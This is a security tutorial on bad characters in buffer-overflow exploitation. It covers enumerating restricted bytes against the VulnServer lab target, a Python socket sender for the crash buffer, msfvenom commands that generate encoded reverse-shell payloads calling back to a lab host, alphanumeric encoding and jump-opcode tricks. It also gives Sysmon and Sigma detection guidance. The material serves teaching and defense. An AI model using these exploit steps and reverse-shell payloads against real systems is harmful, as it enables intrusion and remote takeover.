Bad Characters, Null Bytes, and Restricted Character Sets
Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.
Contents
- 1. What Are Bad Characters? The Concept Explained
- 2. Why \x00 Is Always the First Enemy
- 3. Common Bad Characters by Protocol and Context
- 4. Building and Sending the Test Byte Array
- 5. Inspecting Memory: Immunity Debugger and mona.py
- 6. Iterative Elimination: Narrowing the Bad List
- 7. Encoding Shellcode with msfvenom
- 8. Alphanumeric and Printable-Only Constraints
- 9. Instruction Substitution: Jumping Without Bad Opcodes
- 10. Unicode / Wide-Character Transformations
- 11. Common Attacker Techniques
- 12. Defensive Strategies & Detection
- 13. Tools for Bad-Character Analysis
- 14. MITRE ATT&CK Mapping
- Summary
- Related Tutorials
- References
1. What Are Bad Characters? The Concept Explained
A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: it corrupts, truncates, or transforms the payload before it lands intact in the memory that execution will be redirected to. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.
Shellcode cannot contain bytes that the target treats specially, such as a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets stop on specific sentinel bytes: a null for the str* family and sprintf, a newline for gets.
When you inspect memory after a crash, you are hunting for three distinct failure modes:
- Missing bytes: characters stripped entirely by a sanitiser.
- Altered bytes: characters transformed (e.g., \x80 appearing as \x01).
- Premature termination: a byte that halts the copy, so nothing after it is written.
Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.
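The three failure modes can be told apart mechanically once the sent bytes and the bytes read back from memory are side by side. The following is a minimal sketch, not a replacement for a debugger plugin. The function name `classify_divergence` is hypothetical, and it assumes `observed` has already been trimmed to the bytes that belong to the test block (a real memory dump would contain unrelated data after a truncation point).

```python
from typing import Optional, Tuple


def classify_divergence(sent: bytes, observed: bytes) -> Tuple[str, Optional[int]]:
    """Return (verdict, offset) for the first place `observed` departs from `sent`.

    Assumption: `observed` holds only the bytes attributable to the test block.
    """
    limit = min(len(sent), len(observed))
    # First offset where the two sequences disagree, if any.
    first = next((i for i in range(limit) if sent[i] != observed[i]), None)

    if first is None:
        if len(observed) >= len(sent):
            return ("intact", None)
        # `observed` is a strict prefix of `sent`: the copy stopped early.
        return ("truncated", len(observed))

    # If everything after the mismatch lines up with `sent` minus one byte,
    # that byte was stripped rather than rewritten.
    if sent[first + 1:].startswith(observed[first:]):
        return ("missing", first)
    return ("altered", first)


sent = bytes(range(0x01, 0x0B))
print(classify_divergence(sent, sent[:4]))                      # premature termination
print(classify_divergence(sent, sent[:3] + sent[4:]))           # \x04 stripped
print(classify_divergence(sent, sent[:3] + b"\xff" + sent[4:]))  # \x04 rewritten
```

In every case the returned offset indexes into `sent`, so `sent[offset]` is the byte to investigate.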

2. Why \x00 Is Always the First Enemy
The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.
| Function | Behavior on \x00 |
|---|---|
| strcpy | Stops copying at the first null |
| strncpy | Stops at null or n bytes |
| strlen | Returns length up to first null |
| sprintf | Copies a %s argument only up to its first null |
| gets | Reads up to a newline rather than a null; legacy, present in old targets |
At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.
Network contexts differ. A socket recv call reads up to a requested byte count and passes null bytes from the wire into the buffer unchanged. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
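The two layers can be modelled in a few lines. This is a sketch only: `c_strcpy` is a hypothetical Python stand-in for the C routine's copy-until-null behaviour, not a binding to the CRT, and `received` is made-up sample data representing what recv handed back.

```python
def c_strcpy(src: bytes) -> bytes:
    """Model strcpy: copy up to, but not including, the first null byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# The transport layer delivers all five bytes, null included.
received = b"\x41\x42\x00\x43\x44"

# The string layer keeps only what precedes the null.
copied = c_strcpy(received)

print(len(received), len(copied))  # 5 2
```

Everything after the null reached the process but never reached the destination buffer, which is why the socket and the string API have to be evaluated separately.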
3. Common Bad Characters by Protocol and Context
Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).
| Byte | Hex | Reason |
|---|---|---|
| Null | \x00 | String terminator — always bad in string overflows |
| Line Feed | \x0A | Newline — terminates input in many protocol parsers |
| Carriage Return | \x0D | CR — terminates input lines (HTTP, SMTP, POP3) |
| Space | \x20 | Whitespace delimiter — terminates tokens in some parsers |
| 0xFF byte | \xFF | Causes issues in some parsing contexts (for example, Telnet treats it as the IAC command prefix) |
A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
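To get a feel for how small the URI-legal set is, the sketch below counts which byte values fall outside it. It assumes the parser accepts exactly the RFC 3986 unreserved and reserved characters plus `%`. Real servers differ, so treat `URI_LEGAL` and `illegal_uri_bytes` as illustrative names, not as a description of any particular product.

```python
import string
from typing import List

# RFC 3986: unreserved + gen-delims + sub-delims, plus '%' for percent-encoding.
URI_LEGAL = frozenset(
    (
        string.ascii_letters
        + string.digits
        + "-._~"          # remaining unreserved characters
        + ":/?#[]@"       # gen-delims
        + "!$&'()*+,;="   # sub-delims
        + "%"
    ).encode("ascii")
)


def illegal_uri_bytes(data: bytes) -> List[int]:
    """Return the sorted, distinct byte values in `data` outside URI_LEGAL."""
    return sorted(set(data) - URI_LEGAL)


# Of the 256 possible byte values, only 85 are legal under this assumption.
rejected = illegal_uri_bytes(bytes(range(256)))
print(len(URI_LEGAL), len(rejected))  # 85 171
```

The same function works on the defensive side as an allowlist check at the input boundary: any non-empty result is grounds to reject the request.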
4. Building and Sending the Test Byte Array
The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:
# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))
offset = 2003 # VulnServer TRUN EIP offset (illustrative)
buf = b"A" * offset
buf += b"B" * 4 # EIP overwrite marker
buf += bytes(badchar_test) # byte array lands at ESP
buf += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:
import socket

# Lab address and port are illustrative
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024) # read the service banner
s.sendall(b"TRUN /.:/" + buf) # VulnServer TRUN command; sendall keeps writing until the whole buffer is sent
s.close()

After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.
5. Inspecting Memory: Immunity Debugger and mona.py
In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.
!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>

- !mona config sets the output directory. Because the working folder here contains %p, mona writes its output into a per-process subfolder, so point -f at the location where bytearray.bin was actually written.
- !mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01–\xFF) excluding the specified bad chars.
- !mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.
Annotated mona output looks like:
[+] Comparing with memory at address 0x00ab1a30
Only the first 18 bytes were identical
Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List
Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.
If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:
BADCHARS = b"\x00\x0a\x0d" # grows one confirmed byte per pass
full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)
# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.
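The elimination loop is easier to reason about against a simulated target. In the sketch below, `simulated_target` is an invented stand-in for the debugged process (it truncates on \x0a and \x0d and strips \x14), and `enumerate_badchars` is a hypothetical helper. Neither talks to a real service or debugger; the point is only to show that confirming one byte per pass converges on the full list.

```python
def simulated_target(data: bytes) -> bytes:
    """Invented input handler: stops at 0x0a/0x0d and silently drops 0x14."""
    out = bytearray()
    for b in data:
        if b in (0x0A, 0x0D):  # terminator: nothing after it is copied
            break
        if b == 0x14:          # sanitiser: byte removed, copy continues
            continue
        out.append(b)
    return bytes(out)


def enumerate_badchars(target, known: bytes = b"\x00") -> bytes:
    """Confirm one bad byte per pass until the test block survives intact."""
    bad = bytearray(known)
    while True:
        test = bytes(b for b in range(1, 256) if b not in bad)
        seen = target(test)
        # First offset where memory no longer matches what was sent.
        idx = next(
            (i for i, b in enumerate(test) if i >= len(seen) or seen[i] != b),
            None,
        )
        if idx is None:
            return bytes(bad)
        bad.append(test[idx])  # only the first offender is confirmed


result = enumerate_badchars(simulated_target)
print(result.hex(" "))  # 00 0a 0d 14
```

Four passes are needed here: one per discovered byte plus a final clean run. Bytes that sit behind a terminator, such as \x14 behind \x0a, only become visible after the earlier offender is excluded.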

7. Encoding Shellcode with msfvenom
Once the bad-char set is known, generate shellcode that avoids it. msfvenom’s -b flag specifies the forbidden bytes; it then picks an encoder (x86/shikata_ga_nai by default) to re-encode around them.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.
Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.
Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.
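Whichever encoder is used, it is worth checking the generated bytes against the exclusion list before trusting them. A minimal sketch follows. `find_bad_bytes` is a hypothetical helper, and the `payload` value is arbitrary sample data standing in for the `buf` variable that `-f python` output would define.

```python
from typing import List, Tuple


def find_bad_bytes(payload: bytes, badchars: bytes) -> List[Tuple[int, int]]:
    """Return (offset, byte value) for every forbidden byte found in `payload`."""
    forbidden = set(badchars)
    return [(i, b) for i, b in enumerate(payload) if b in forbidden]


BADCHARS = b"\x00\x0a\x0d\x20"
payload = b"\x41\x42\x0a\x43\x20"  # placeholder bytes, not real encoder output

for offset, value in find_bad_bytes(payload, BADCHARS):
    print(f"offset {offset}: \\x{value:02x}")
```

An empty result means the payload is clean with respect to the listed bytes. It says nothing about bytes that have not yet been identified as bad.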

8. Alphanumeric and Printable-Only Constraints
When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21–\x7E printable range — ideal when the target only passes printable URI characters.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size: an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
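A quick way to confirm that output really satisfies a printable-only or alphanumeric-only constraint is to classify its byte range. The sketch below uses the \x21–\x7E range quoted above for "printable". `charset_class` and its three labels are illustrative names chosen for this example.

```python
import string

ALNUM = frozenset((string.ascii_letters + string.digits).encode("ascii"))


def charset_class(payload: bytes) -> str:
    """Return the tightest class the payload fits into.

    'alphanumeric' : only A-Z, a-z, 0-9
    'printable'    : only bytes in 0x21-0x7E
    'unrestricted' : anything else
    """
    if all(b in ALNUM for b in payload):
        return "alphanumeric"
    if all(0x21 <= b <= 0x7E for b in payload):
        return "printable"
    return "unrestricted"


print(charset_class(b"PYIIIIIIII"))  # alphanumeric
print(charset_class(b"AB!~"))        # printable
print(charset_class(b"AB\x00"))      # unrestricted
```

Note that a space (\x20) falls outside the \x21–\x7E range, so a payload containing one is reported as unrestricted.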
9. Instruction Substitution: Jumping Without Bad Opcodes
Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP opcode is \xEB, and \xEB can be bad in targets that filter or transform high bytes, in which case the instruction cannot be used as-is.
| Instruction | Opcode bytes | Notes |
|---|---|---|
| JMP SHORT +6 | \xEB \x06 | \xEB often restricted |
| JE / JNE pair | \x74 .. \x75 .. | Complementary conditions, so one of the two branches is always taken |
| Near JMP | \xE9 .. .. .. .. | Alternative when \xEB is bad, but small forward displacements encode \x00 bytes |
A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:
; JMP SHORT replacement using complementary conditionals
je short target ; 74 xx -> jump if ZF=1
jne short target ; 75 xx -> jump if ZF=0
; one branch is always taken; no \xEB byte present
target:
; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT that hops over the adjacent handler pointer into the payload, so its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
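The displacement bytes of the conditional pair deserve the same scrutiny as the opcodes. Because the two instructions sit at different addresses, they need different rel8 values to reach the same target. The sketch below computes both for a forward jump and is an illustration only. `je_jne_pair` is a hypothetical helper, and `distance` is assumed to be the number of bytes between the end of the pair and the target.

```python
def je_jne_pair(distance: int) -> bytes:
    """Encode `je target; jne target` for a target `distance` bytes past the pair.

    rel8 is measured from the end of each instruction, so the JE (which is
    followed by the 2-byte JNE) needs a displacement 2 larger than the JNE.
    """
    if not 0 <= distance <= 125:  # keep both rel8 values within 0..127
        raise ValueError("distance must be between 0 and 125 bytes")
    return bytes([0x74, distance + 2, 0x75, distance])


pair = je_jne_pair(6)
print(pair.hex(" "))  # 74 08 75 06

# A target immediately after the pair produces a null displacement byte.
print(je_jne_pair(0).hex(" "))  # 74 02 75 00
```

The second example shows why the pair is not automatically safe: a displacement can itself land on a bad character, in which case padding between the pair and the target changes the value.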
10. Unicode / Wide-Character Transformations
A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.
# You send: \x41\x42
# Memory shows: \x41\x00\x42\x00 <- a null follows every original byte
sent = b"\x41\x42"
observed = b"\x41\x00\x42\x00" # Unicode expansion in the debugger

A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded, and bytes above \x7F may map to different code units altogether, depending on the active code page. The classical mitigation is Venetian shellcode: manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
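Spotting the interleave can be automated before any time is spent treating it as ordinary bad-character corruption. A minimal sketch, assuming the simple case where every sent byte is followed by a single \x00 (true for the ASCII range; higher bytes depend on the code page). `looks_widened` is a hypothetical helper name.

```python
def looks_widened(sent: bytes, observed: bytes) -> bool:
    """True if `observed` begins with `sent` expanded to byte + 0x00 pairs."""
    if not sent:
        return False
    expected = b"".join(bytes([b, 0x00]) for b in sent)
    return observed.startswith(expected)


print(looks_widened(b"\x41\x42", b"\x41\x00\x42\x00"))  # True
print(looks_widened(b"\x41\x42", b"\x41\x42"))          # False
```

Running this on the first few ASCII-range bytes of the test block is usually enough to decide whether the buffer is being widened.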
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Bad-char enumeration | Inject \x01–\xFF, diff memory, identify forbidden bytes |
| Shellcode encoding | Re-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes |
| Alphanumeric shellcode | alpha_mixed / Alpha2 for printable-only constraints |
| Jump substitution | Replace \xEB with JE/JNE pairs or near JMP |
| Venetian shellcode | Survive Unicode expansion in wide-character buffers |
| Egghunter staging | Small finder stub locating a larger payload in tight buffers |
These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.
12. Defensive Strategies & Detection
Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.
| Sysmon Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Frameworks (Metasploit, Empire) launching payloads |
| 3 | Network Connection | Outbound C2 from an exploited process |
| 8 | CreateRemoteThread | Post-exploitation thread injection |
| 10 | ProcessAccess | Cross-process open by injected payload |
| 11 | FileCreate | Shellcode or payload dropped to disk |
Sysmon Event ID 10 (ProcessAccess) is the primary signal. When shellcode running from anonymous stack or heap memory opens a handle to another process, the event's CallTrace contains UNKNOWN frames: code with no backing image on disk.
title: Shellcode Injection via Suspicious Process Access
logsource:
    category: process_access
    product: windows
detection:
    selection:
        EventID: 10
        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
    condition: selection
level: high

Additional telemetry and hardening:
- ETW: subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
- Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
- WAF / network: flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
- Compiler mitigations: /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
- Input validation: allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
- WDEG: enforce DEP and CFG per-process via Set-ProcessMitigation.
- Memory integrity: flag executable pages not backed by a known on-disk image.
- Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.
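For triage outside a SIEM, the ProcessAccess selection logic can be mirrored in a few lines. The sketch below assumes each Sysmon event has already been parsed into a Python dict keyed by the field names EventID, GrantedAccess, and CallTrace. The dict shape, the `matches_rule` name, and the sample events are assumptions made for illustration.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}


def matches_rule(event: dict) -> bool:
    """Mirror the selection: EID 10, a listed access mask, UNKNOWN in CallTrace."""
    return (
        str(event.get("EventID")) == "10"
        and str(event.get("GrantedAccess", "")).lower() in SUSPICIOUS_ACCESS
        and "unknown" in str(event.get("CallTrace", "")).lower()
    )


# Made-up sample events for demonstration only.
events = [
    {
        "EventID": 10,
        "GrantedAccess": "0x1F3FFF",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(0000000000A10F3C)",
    },
    {
        "EventID": 10,
        "GrantedAccess": "0x1000",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4",
    },
]

print([matches_rule(e) for e in events])  # [True, False]
```

Comparison is case-insensitive here so that differently cased hex masks still match. Expect false positives from legitimate software that generates code at runtime, and tune the access masks to the environment.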

13. Tools for Bad-Character Analysis
| Tool | Description | Link |
|---|---|---|
| Immunity Debugger | Crash analysis, ESP dump inspection | immunityinc.com |
| mona.py | Bytearray generation and memory comparison | github.com/corelan |
| WinDbg | Opcode/gadget inspection, memory diffing | microsoft.com |
| msfvenom | Shellcode generation and encoding (-b) | offsec.com |
| Alpha2 | Standalone alphanumeric shellcode encoder | github.com |
| x64dbg | User-mode debugging and patching | x64dbg.com |
| Ghidra | Static opcode/disassembly analysis | ghidra-sre.org |
| Volatility | Memory forensics, unbacked code regions | volatilityfoundation.org |
14. MITRE ATT&CK Mapping
Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Process crash bursts, EID 1 framework launches |
| Exploit Public-Facing Application | T1190 | WAF anomalies, service access violations |
| Exploitation for Privilege Escalation | T1068 | Local overflow → elevated process behavior |
| Obfuscated Files or Information | T1027 | Encoder signatures (shikata/alpha) on disk/wire |
| Process Injection | T1055 | Sysmon EID 8/10, UNKNOWN in CallTrace |
Summary
- Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it lands intact in memory; you must enumerate them empirically, never assume.
- \x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
- Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
- Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
- Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).
Related Tutorials
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- CAPEC-52: Embedding NULL Bytes – MITRE CAPEC
- CWE-158: Improper Neutralization of Null Byte or NUL Character – MITRE CWE
- Exploit Writing Tutorial Part 9: Introduction to Win32 Shellcoding (Bad Characters) – Corelan
- Exploit Writing Tutorial Part 1: Stack Based Overflows (Bad Characters & Restricted Chars) – Corelan
- Embedding Null Code – OWASP Foundation
- Exploiting x86 Stack Based Buffer Overflows (Null Bytes & Shellcode) – Exploit-DB